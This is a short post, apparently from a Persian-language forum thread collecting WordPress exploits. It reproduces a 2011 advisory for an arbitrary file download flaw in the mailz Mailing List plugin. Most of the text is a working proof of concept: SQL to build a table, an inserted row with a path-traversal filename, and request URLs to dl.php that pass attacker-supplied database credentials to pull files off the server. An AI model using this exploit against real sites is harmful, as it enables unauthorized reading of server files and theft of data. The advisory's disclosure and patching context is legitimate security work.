•••کلکسیون باگ های وردپرس•••

کد:

#Exploit Title: Mailing List plugin for Wordpress Arbitrary file download

#Version:  < 1.4.2

#Date: 2011-12-19

#Author: 6Scan (http://6scan.com) security team

#Software Link: http://wordpress.org/extend/plugins/mailz/

#Official fix: This advisory is released after the vendor (http://www.zingiri.com)  was contacted and fixed the issue promptly.

#Description :  Unauthorized users can download arbitrary files from the server using this exploit.

#                                                             Vulnerable script includes config.php file, which connects to database with supplied credentials. Database entries are used to retrieve files from host.

#                                                             The bug is in config.php, but accessible from other file.

 

PoC

1) Setup mysql database

2) Create table with the next structure:

CREATE TABLE IF NOT EXISTS `phplist_attachment` (

  `filename` varchar(1024) NOT NULL,

  `mimetype` varchar(1024) NOT NULL,

  `remotefile` varchar(1024) NOT NULL,

  `description` varchar(1024) NOT NULL,

  `size` int(11) NOT NULL,

  `id` int(11) NOT NULL

) ENGINE=InnoDB DEFAULT CHARSET=latin1;

 

3) Add this raw into database:

INSERT INTO `phplist_attachment` (`filename`, `mimetype`, `remotefile`, `description`, `size`, `id`) VALUES

('../../../../../somefile.txt', '', '', '', 0, 0);

 

 

4) Call the script with database parameters and file id to download:

 

http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?wph=localhost&wpdb=test&user=root&wpp=root&id=0

 

The credentials are now saved in session, and there is no need to continue passing them:

http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=1

http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=2

http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=3